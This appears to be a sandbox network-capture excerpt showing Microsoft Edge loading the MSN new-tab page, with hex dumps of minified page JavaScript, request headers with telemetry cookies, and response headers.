                                                                                                                                                                  2025-01-11 06:54:34 UTC1250INData Raw: 34 64 62 0d 0a 63 74 6f 72 2e 22 2c 22 2f 77 65 61 74 68 65 72 2d 63 61 72 64 2d 77 63 2e 22 2c 22 2f 77 65 6c 63 6f 6d 65 47 72 65 65 74 69 6e 67 4c 69 67 68 74 2e 22 2c 22 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 78 6d 6c 62 75 69 6c 64 65 72 32 5f 6c 69 62 5f 78 6d 6c 62 75 69 6c 64 65 72 32 5f 6d 69 6e 5f 6a 73 2e 22 5d 2c 68 65 3d 5b 22 2f 62 61 63 6b 67 72 6f 75 6e 64 2d 67 61 6c 6c 65 72 79 2e 22 2c 22 2f 63 61 72 64 2d 61 63 74 69 6f 6e 73 2d 77 63 2e 22 2c 22 2f 63 68 61 6e 6e 65 6c 2d 64 61 74 61 2d 63 6f 6e 6e 65 63 74 6f 72 2e 22 2c 22 2f 63 68 61 6e 6e 65 6c 2d 73 74 6f 72 65 2e 22 2c 22 2f 63 6f 64 65 78 2d 62 69 6e 67 2d 63 68 61 74 2e 22 2c 22 2f 63 6f 6d 6d 6f 6e 2e 22 2c 22 2f 63 6f 6d 6d 6f 6e 2d 63 73 63 6f 72 65 2e 22 2c 22 2f 63 6f
                                                                                                                                                                  Data Ascii: 4dbctor.","/weather-card-wc.","/welcomeGreetingLight.","/node_modules_xmlbuilder2_lib_xmlbuilder2_min_js."],he=["/background-gallery.","/card-actions-wc.","/channel-data-connector.","/channel-store.","/codex-bing-chat.","/common.","/common-cscore.","/co
                                                                                                                                                                  2025-01-11 06:54:34 UTC4043INData Raw: 66 63 34 0d 0a 32 5f 6d 69 6e 5f 6a 73 2e 22 5d 2c 75 65 3d 5b 22 2f 77 69 64 67 65 74 73 2d 72 65 67 69 6f 6e 2e 22 2c 22 2f 73 70 6f 72 74 73 2d 69 6e 66 6f 2e 22 2c 22 2f 73 70 6f 72 74 73 2d 6d 61 74 63 68 2d 6c 69 73 74 2e 22 2c 22 2f 73 70 6f 72 74 73 2d 69 6e 66 6f 2d 75 74 69 6c 73 2e 22 2c 22 2f 6d 6f 6e 65 79 2d 69 6e 66 6f 2e 22 2c 22 2f 6d 6f 6e 65 79 2d 71 75 6f 74 65 2d 76 65 72 74 69 63 61 6c 2d 77 61 74 63 68 6c 69 73 74 2e 22 2c 22 2f 6d 6f 6e 65 79 2d 69 6e 66 6f 2d 73 65 72 76 69 63 65 2e 22 2c 22 2f 74 72 61 66 66 69 63 2d 63 61 72 64 2d 77 63 2e 22 5d 3b 6c 65 74 20 64 65 3b 66 75 6e 63 74 69 6f 6e 20 70 65 28 29 7b 72 65 74 75 72 6e 20 64 65 7d 76 61 72 20 67 65 3d 2f 5c 73 2f 3b 76 61 72 20 66 65 3d 2f 5e 5c 73 2b 2f 3b 63 6f 6e 73
                                                                                                                                                                  Data Ascii: fc42_min_js."],ue=["/widgets-region.","/sports-info.","/sports-match-list.","/sports-info-utils.","/money-info.","/money-quote-vertical-watchlist.","/money-info-service.","/traffic-card-wc."];let de;function pe(){return de}var ge=/\s/;var fe=/^\s+/;cons
                                                                                                                                                                  2025-01-11 06:54:34 UTC8200INData Raw: 32 30 30 30 0d 0a 6f 3d 63 2e 72 65 70 6c 61 63 65 28 22 73 70 61 6c 69 6e 6b 3a 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 2f 64 65 62 75 67 22 2c 22 22 29 29 3b 63 6f 6e 73 74 20 68 3d 6f 7c 7c 22 6c 61 74 65 73 74 22 2c 75 3d 65 2e 6d 61 70 28 28 65 3d 3e 7b 63 6f 6e 73 74 20 73 3d 65 2e 75 72 6c 2e 73 70 6c 69 74 28 22 2f 22 29 3b 72 65 74 75 72 6e 20 73 5b 34 5d 3d 68 2c 65 2e 75 72 6c 3d 60 24 7b 74 7d 24 7b 73 2e 6a 6f 69 6e 28 22 2f 22 29 7d 60 2c 65 7d 29 29 2c 64 3d 6e 7c 7c 5b 5d 2c 70 3d 73 7c 7c 5b 5d 3b 6c 65 74 20 67 3d 75 3b 72 65 74 75 72 6e 20 70 2e 6c 65 6e 67 74 68 26 26 28 67 3d 75 2e 66 69 6c 74 65 72 28 28 65 3d 3e 70 2e 73 6f 6d 65 28 28 74 3d 3e 65 2e 75 72 6c 2e 69 6e 63 6c 75 64 65 73 28 74 29 29 29 29 29 29 2c 64 2e 6c 65 6e
                                                                                                                                                                  Data Ascii: 2000o=c.replace("spalink:","").replace("/debug",""));const h=o||"latest",u=e.map((e=>{const s=e.url.split("/");return s[4]=h,e.url=`${t}${s.join("/")}`,e})),d=n||[],p=s||[];let g=u;return p.length&&(g=u.filter((e=>p.some((t=>e.url.includes(t)))))),d.len
                                                                                                                                                                  2025-01-11 06:54:34 UTC4154INData Raw: 31 30 33 32 0d 0a 70 72 67 2d 77 70 6f 2d 69 6e 66 6f 70 72 6d 2d 63 74 72 6c 22 21 3d 65 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 3b 6e 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 73 65 74 28 22 66 64 68 65 61 64 22 2c 65 29 7d 5b 22 73 77 22 2c 22 65 64 67 45 78 70 4d 61 73 6b 22 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 6e 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 65 29 29 29 7d 72 65 74 75 72 6e 20 65 2e 73 74 72 69 70 4c 6f 63 61 74 69 6f 6e 26 26 5b 22 6c 6f 63 61 74 69 6f 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 6e 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 65 29 29 29 2c 65 2e 69 73 46 75 72 74 68 65 72 4e 6f 72 6d 61 6c 69 7a 65 64 46 6f 72 46 65 65 64 43 61 6c 6c 26 26 28 5b 22 63 62 79 70 61 73 73 22 2c
                                                                                                                                                                  Data Ascii: 1032prg-wpo-infoprm-ctrl"!=e)).join(",");n.searchParams.set("fdhead",e)}["sw","edgExpMask"].forEach((e=>n.searchParams.delete(e)))}return e.stripLocation&&["location"].forEach((e=>n.searchParams.delete(e))),e.isFurtherNormalizedForFeedCall&&(["cbypass",
                                                                                                                                                                  2025-01-11 06:54:34 UTC8200INData Raw: 32 30 30 30 0d 0a 3c 31 65 33 2a 74 68 69 73 2e 5f 6d 69 6e 43 61 63 68 65 41 67 65 53 65 63 6f 6e 64 73 29 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 74 61 6c 65 57 68 69 6c 65 52 65 76 61 6c 69 64 61 74 65 53 74 72 61 74 65 67 79 2e 68 61 6e 64 6c 65 28 65 29 7d 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 47 6f 74 20 61 20 6e 75 6c 6c 20 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 74 68 65 20 63 61 63 68 65 22 29 7d 29 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 74 68 69 73 2e 5f 6e 65 74 77 6f 72 6b 46 69 72 73 74 53 74 72 61 74 65 67 79 2e 68 61 6e 64 6c 65 28 65 29 29 29 7d 7d 63 6f 6e 73 74 20 53 74 3d 38 36 34 30 30 2c 78 74 3d 35 31 38 34 65 33 2c 6b 74 3d 22 6f 66 66 69 63 65 22 3b 66 75 6e 63 74 69 6f 6e 20 50 74 28 65
                                                                                                                                                                  Data Ascii: 2000<1e3*this._minCacheAgeSeconds)return t}return this._staleWhileRevalidateStrategy.handle(e)}throw new Error("Got a null response from the cache")})).catch((()=>this._networkFirstStrategy.handle(e)))}}const St=86400,xt=5184e3,kt="office";function Pt(e
                                                                                                                                                                  2025-01-11 06:54:34 UTC15INData Raw: 61 0d 0a 64 65 26 26 28 73 65 6c 66 2e 0d 0a
                                                                                                                                                                  Data Ascii: ade&&(self.


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                  37192.168.11.2064969204.79.197.203443
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-11 06:54:34 UTC1527OUTGET /edge/ntp?locale=en-US&title=New+tab&OCID=MNHP_U531&enableForceCache=true HTTP/1.1
                                                                                                                                                                  Host: ntp.msn.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
                                                                                                                                                                  Device-Memory: 8
                                                                                                                                                                  sec-ch-ua-model:
                                                                                                                                                                  rtt: 150
                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                  sec-ch-ua-full-version: "94.0.992.31"
                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                  downlink: 10
                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                  ect: 4g
                                                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  Referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531&firstlaunch=1
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                  Cookie: _C_Auth=; pglt-edgeChromium-dhp=2083; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; USRLOC=; MUID=0136911D054E6BFC0E90846C04216AB7; MUIDB=0136911D054E6BFC0E90846C04216AB7; _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79ce19f4-5d97-4e79-bde7-86678df03e68; ai_session=4GQ3I+JGTtsRdJFn4pBfwj|1736578471570|1736578471570; sptmarket_restored=en-US||us|en-us|en-us|en||cf=8|RefA=F7B66E0F99774EE4994A9572D133A3C9.RefC=2025-01-11T06:54:29Z; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                  2025-01-11 06:54:34 UTC8449INHTTP/1.1 200 OK
                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  Content-Length: 53639
                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                  Set-Cookie: _C_ETH=1; expires=Fri, 10 Jan 2025 06:54:34 GMT; domain=.msn.com; path=/; secure; httponly
                                                                                                                                                                  Set-Cookie: _C_Auth=
                                                                                                                                                                  Set-Cookie: sptmarket_restored=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/
                                                                                                                                                                  Set-Cookie: USRLOC=; expires=Mon, 11 Jan 2027 06:54:34 GMT; domain=.msn.com; path=/; secure; samesite=none; httponly
                                                                                                                                                                  Set-Cookie: _EDGE_S=F=1&SID=06A729D55B716F1D1BB63CA45A186E3F; domain=.msn.com; path=/; httponly
                                                                                                                                                                  Access-Control-Allow-Methods: HEAD,GET,OPTIONS
                                                                                                                                                                  Content-Security-Policy: child-src 'self';connect-src 'self' *.mavideo.microsoft.com arc.msn.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn browser.events.data.msn.com browser.events.data.msn.cn browser.events.data.microsoftstart.com browser.events.data.microsoftstart.cn business.bing.com/api/ usgov.business.bing.com/api/ cdn.hubblecontent.osi.office.net copilotexplore.azurewebsites.net events-sandbox.data.msn.com events-sandbox.data.msn.cn events-sandbox.data.microsoftstart.com events-sandbox.data.microsoftstart.cn finance-services.msn.com https://*.sharepoint.com/_api/v2.0/ https://*.sharepoint-df.com/_api/v2.0/ https://*.sharepoint.com/_api/v2.1/ https://*.sharepoint-df.com/_api/v2.1/ https://bingretailmsndata.azureedge.net/msndata/ https://browser.pipe.aria.microsoft.com/Collector/ https://dev.virtualearth.net/REST/v1/Imagery/ https://dev.ditu.live.com/REST/v1/Imagery/ https://ecn.dev.virtualearth.net https://jsconfig.adsafeprotected.com https://g.bing.com https://msx.bing.com https://pet [TRUNCATED]
                                                                                                                                                                  X-Robots-Tag: noindex
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                  X-XSS-Protection: 1
                                                                                                                                                                  X-UA-Compatible: IE=Edge;chrome=1
                                                                                                                                                                  x-fabric-cluster: pmeprodeus
                                                                                                                                                                  nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
                                                                                                                                                                  report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]}
                                                                                                                                                                  Strict-Transport-Security: max-age=1209600; includeSubDomains; preload
                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR
                                                                                                                                                                  X-Ceto-ref: 678215aa37d0423eb84d08fc369251b2|AFD:8E6F404802614117A52C4D98A9D251F8|2025-01-11T06:54:34.494Z
                                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                                  X-MSEdge-Ref: Ref A: 8E6F404802614117A52C4D98A9D251F8 Ref B: CHI30EDGE0117 Ref C: 2025-01-11T06:54:34Z
                                                                                                                                                                  Date: Sat, 11 Jan 2025 06:54:34 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  2025-01-11 06:54:34 UTC698INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 64 69 72 3d 22 6c 74 72 22 20 3e 0d 0a 3c 68 65 61 64 20 64 61 74 61 2d 69 6e 66 6f 3d 22 66 3a 6d 73 6e 61 6c 6c 65 78 70 75 73 65 72 73 2c 70 72 67 2d 73 70 2d 6c 69 76 65 61 70 69 2c 70 72 67 2d 66 69 6e 2d 63 6f 6d 70 6f 66 2c 70 72 67 2d 66 69 6e 2d 68 70 6f 66 6c 69 6f 2c 70 72 67 2d 66 69 6e 2d 70 6f 66 6c 69 6f 2c 70 72 67 2d 31 73 77 2d 63 63 2d 63 61 6c 66 65 65 64 69 63 2c 61 64 73 2d 63 66 76 34 2c 31 73 2d 70 6e 70 66 65 64 6c 6f 63 63 66 2c 70 6e 70 77 78 65 78 70 69 72 65 33 36 30 2c 62 69 6e 67 5f 76 32 5f 73 63 6f 70 65 2c 70 72 67 2d 31 73 77 2d 73 61 63 66 78 32 74 63 2c 70 72 67 2d 31 73 77 2d 73 61 2d 63 61 70 63 6f 6e 66 33 74
                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en-us" dir="ltr" ><head data-info="f:msnallexpusers,prg-sp-liveapi,prg-fin-compof,prg-fin-hpoflio,prg-fin-poflio,prg-1sw-cc-calfeedic,ads-cfv4,1s-pnpfedloccf,pnpwxexpire360,bing_v2_scope,prg-1sw-sacfx2tc,prg-1sw-sa-capconf3t
                                                                                                                                                                  2025-01-11 06:54:34 UTC436INData Raw: 70 6f 2d 70 72 67 32 2d 65 76 6c 63 66 70 63 61 70 32 2c 31 73 2d 77 70 6f 2d 70 72 67 32 2d 65 76 6c 63 67 64 64 6e 2c 31 73 2d 77 70 6f 2d 70 72 67 32 2d 65 76 6c 63 74 33 2c 70 72 67 2d 31 73 77 2d 62 67 2d 70 32 2c 70 72 67 2d 31 73 77 2d 63 6d 65 76 6c 74 2c 70 72 67 2d 70 32 2d 74 66 2d 62 64 67 70 76 2d 61 69 2c 70 72 67 2d 70 72 32 2d 66 69 65 70 6c 63 2c 70 72 67 2d 70 72 32 2d 74 72 66 2d 72 68 69 67 68 69 6d 70 2c 70 72 67 2d 70 72 32 2d 77 78 65 76 6f 6c 6e 6f 74 69 2c 70 72 67 2d 75 70 73 61 69 70 2d 77 31 2d 74 2c 31 73 2d 72 70 73 73 65 63 61 75 74 68 74 2c 6a 6a 5f 66 61 63 5f 63 2c 70 72 67 2d 63 67 70 32 2d 68 6f 74 74 32 2c 31 73 2d 63 67 2d 70 32 68 6f 74 33 2c 70 72 67 2d 31 73 77 2d 64 61 69 6c 79 70 6f 70 2c 70 72 67 2d 31 73 77 2d
                                                                                                                                                                  Data Ascii: po-prg2-evlcfpcap2,1s-wpo-prg2-evlcgddn,1s-wpo-prg2-evlct3,prg-1sw-bg-p2,prg-1sw-cmevlt,prg-p2-tf-bdgpv-ai,prg-pr2-fieplc,prg-pr2-trf-rhighimp,prg-pr2-wxevolnoti,prg-upsaip-w1-t,1s-rpssecautht,jj_fac_c,prg-cgp2-hott2,1s-cg-p2hot3,prg-1sw-dailypop,prg-1sw-
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 2c 31 73 2d 73 68 70 2d 72 63 2d 74 65 2d 63 72 63 66 61 32 2c 31 73 2d 73 68 70 2d 72 63 2d 74 2d 74 32 69 76 31 2c 31 73 2d 73 68 70 2d 72 63 2d 74 74 2d 74 32 69 76 31 2c 70 72 67 2d 73 68 2d 66 72 6e 72 63 2c 70 72 67 2d 77 78 2d 64 68 67 72 64 2c 70 72 67 2d 73 68 2d 64 65 61 6c 73 64 61 79 70 64 70 2c 70 72 67 2d 73 68 2d 72 6d 69 74 6d 6c 6e 6b 2d 63 2c 6e 6f 70 69 6e 67 6c 61 6e 63 65 63 61 72 64 69 74 2c 70 72 67 2d 63 67 2d 69 6e 67 61 6d 65 73 2d 78 6e 2d 61 64 73 2c 70 72 67 2d 63 67 2d 69 6e 2d 67 6d 2d 78 6e 2d 61 64 73 2c 70 72 67 2d 31 73 2d 77 6f 72 6b 69 64 2c 31 73 2d 6d 78 72 2d 6e 74 70 70 61 67 65 2d 63 2c 31 73 2d 6d 78 72 2d 77 69 6e 66 65 65 64 2c 31 73 2d 74 65 6d 70 2d 77 69 64 2d 74 2c 70 72 67 2d 31 73 2d 74 77 69 64 2c 61 64
                                                                                                                                                                  Data Ascii: ,1s-shp-rc-te-crcfa2,1s-shp-rc-t-t2iv1,1s-shp-rc-tt-t2iv1,prg-sh-frnrc,prg-wx-dhgrd,prg-sh-dealsdaypdp,prg-sh-rmitmlnk-c,nopinglancecardit,prg-cg-ingames-xn-ads,prg-cg-in-gm-xn-ads,prg-1s-workid,1s-mxr-ntppage-c,1s-mxr-winfeed,1s-temp-wid-t,prg-1s-twid,ad
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 6f 74 3b 64 6f 6d 61 69 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 6f 63 69 64 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 4d 4e 48 50 5f 55 35 33 31 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 72 65 71 75 65 73 74 54 72 61 69 6c 49 6e 66 6f 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 66 6c 69 67 68 74 56 65 72 73 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 35 33 35 30 35 32 33 37 26 71 75 6f 74 3b 7d 2c 20 26 71 75 6f 74 3b 64 65 74 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 7b 26 71 75 6f 74 3b 69 70 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 31 38 35 2e 32 34 36 2e 32 30 39 2e 30 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 74 69 65 72 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 26 71 75 6f 74 3b
                                                                                                                                                                  Data Ascii: ot;domain&quot;:&quot;ntp.msn.com&quot;, &quot;ocid&quot;:&quot;MNHP_U531&quot;, &quot;requestTrailInfo&quot;:{&quot;flightVersion&quot;:&quot;53505237&quot;}, &quot;detection&quot;:{&quot;ip&quot;:&quot;185.246.209.0&quot;, &quot;tier&quot;:&quot;p&quot;
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 29 7b 72 65 74 75 72 6e 20 65 28 6f 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 74 20 69 3d 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 74 5b 6f 5d 3a 32 3b 69 66 28 31 3d 3d 3d 69 26 26 28 6e 2e 70 3d 6e 2e 70 2e 72 65 70 6c 61 63 65 28 22 2f 61 73 73 65 74 73 2e 22 2c 22 2f 61 73 73 65 74 73 32 2e 22 29 29 2c 69 3c 31 29 74 68 72 6f 77 20 65 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 5b 6f 5d 3d 69 2d 31 2c 65 28 6e 2e 65 28 6f 29 29 7d 29 2c 31 30 30 29 7d 29 29 7d 29 29 7d 7d 7d 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 26 26 76 6f 69 64 20
                                                                                                                                                                  Data Ascii: ){return e(o).catch((function(e){const i=t.hasOwnProperty(o)?t[o]:2;if(1===i&&(n.p=n.p.replace("/assets.","/assets2.")),i<1)throw e;return new Promise((function(e){setTimeout((function(){t[o]=i-1,e(n.e(o))}),100)}))}))}}}(),function(){if(void 0!==n&&void
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 73 74 72 75 63 74 6f 72 28 65 3d 32 30 29 7b 74 68 69 73 2e 6d 61 78 4c 65 6e 67 74 68 3d 65 2c 74 68 69 73 2e 6c 69 73 74 3d 5b 5d 7d 70 75 73 68 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 2e 70 75 73 68 28 65 29 2c 74 68 69 73 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 3e 74 68 69 73 2e 6d 61 78 4c 65 6e 67 74 68 26 26 74 68 69 73 2e 6c 69 73 74 2e 73 68 69 66 74 28 29 7d 67 65 74 20 64 61 74 61 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 69 73 74 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6e 2c 6f 3d 42 2e 41 6c 65 72 74 2c 69 2c 72 2c 63 29 7b 74 72 79 7b 63 6f 6e 73 74 20 6c 3d 73 28 29 2c 75 3d 61 28 29 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 63 6f 6e 73 74 7b 70 63 73 49 6e 66 6f 3a 74 2c 70 61 67 65 47 65 6e 54 69 6d 65
                                                                                                                                                                  Data Ascii: structor(e=20){this.maxLength=e,this.list=[]}push(e){this.list.push(e),this.list.length>this.maxLength&&this.list.shift()}get data(){return this.list}};function H(e,t,n,o=B.Alert,i,r,c){try{const l=s(),u=a(),p=function(e){if(e){const{pcsInfo:t,pageGenTime
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 4a 28 65 29 7b 6c 65 74 20 74 3d 65 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 77 69 6e 64 6f 77 73 73 68 65 6c 6c 68 70 22 3a 74 3d 22 64 68 70 22 3b 62 72 65 61 6b 3b 63 61 73 65 22 76 69 64 65 6f 22 3a 74 3d 22 77 61 74 63 68 22 3b 62 72 65 61 6b 3b 63 61 73 65 22 45 64 67 65 4d 6f 62 69 6c 65 22 3a 74 3d 49 28 29 3f 22 6e 74 70 22 3a 22 64 68 70 22 7d 72 65 74 75 72 6e 20 74 7d 6c 65 74 20 56 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 76 61 72 20 65 2c 74 3b 69 66 28 21 64 28 29 29 72 65 74 75 72 6e 20 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6e 75 6c 6c 3d 3d 3d 28 65 3d 77 69 6e 64 6f 77 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 56 7c 7c 28 56 3d 6e
                                                                                                                                                                  Data Ascii: J(e){let t=e;switch(e){case"windowsshellhp":t="dhp";break;case"video":t="watch";break;case"EdgeMobile":t=I()?"ntp":"dhp"}return t}let V;function G(){var e,t;if(!d())return new URLSearchParams(null===(e=window)||void 0===e?void 0:e.location.search);V||(V=n
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 22 63 6f 6e 66 69 67 22 2c 65 2e 54 61 72 67 65 74 65 64 3d 22 74 61 72 67 65 74 65 64 22 2c 65 2e 53 74 69 63 6b 79 3d 22 73 74 69 63 6b 79 22 2c 65 2e 4e 6f 53 74 69 63 6b 79 3d 22 6e 6f 5f 73 74 69 63 6b 79 22 2c 65 2e 41 64 6d 69 6e 3d 22 61 64 6d 69 6e 22 2c 65 2e 46 6f 72 63 65 64 3d 22 66 6f 72 63 65 64 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 7d 28 43 65 7c 7c 28 43 65 3d 7b 7d 29 29 3b 6e 65 77 20 53 65 74 28 5b 22 77 69 6e 70 30 64 61 73 68 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 65 6e 74 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 64 69 72 65 63 74 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 64 69 72 65 63 74 65 6e 74 22 2c 22 77 69 6e 70 31 74 61 73 6b 62 61 72 65 6e 74 22 2c
                                                                                                                                                                  Data Ascii: "config",e.Targeted="targeted",e.Sticky="sticky",e.NoSticky="no_sticky",e.Admin="admin",e.Forced="forced",e.Manual="manual"}(Ce||(Ce={}));new Set(["winp0dash","winp1taskbar","winp1taskbarent","winp1taskbardirect","winp1taskbardirectent","winp1taskbarent",
                                                                                                                                                                  2025-01-11 06:54:34 UTC4096INData Raw: 60 24 7b 7a 65 7d 3d 31 60 29 7d 29 29 3b 63 6f 6e 73 74 20 74 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 28 29 3b 72 65 74 75 72 6e 20 65 26 26 21 21 65 2e 67 65 74 49 74 65 6d 28 58 65 29 7d 29 29 3b 63 6f 6e 73 74 20 6e 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6a 65 28 29 3b 72 65 74 75 72 6e 20 65 26 26 22 31 22 3d 3d 3d 65 2e 67 65 74 49 74 65 6d 28 51 65 29 7d 29 29 3b 63 6f 6e 73 74 20 6f 74 3d 75 28 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 6a 65 28 29 2c 74 3d 21 47 65 28 22 70 72 67 2d 6e 6f 72 65 64 69 72 65 63 74 22 29 26 26 65 26 26 22 31 22 3d
                                                                                                                                                                  Data Ascii: `${ze}=1`)}));const tt=u((()=>{const e=function(){try{return sessionStorage}catch(e){return null}}();return e&&!!e.getItem(Xe)}));const nt=u((()=>{const e=je();return e&&"1"===e.getItem(Qe)}));const ot=u((()=>{const e=je(),t=!Ge("prg-noredirect")&&e&&"1"=
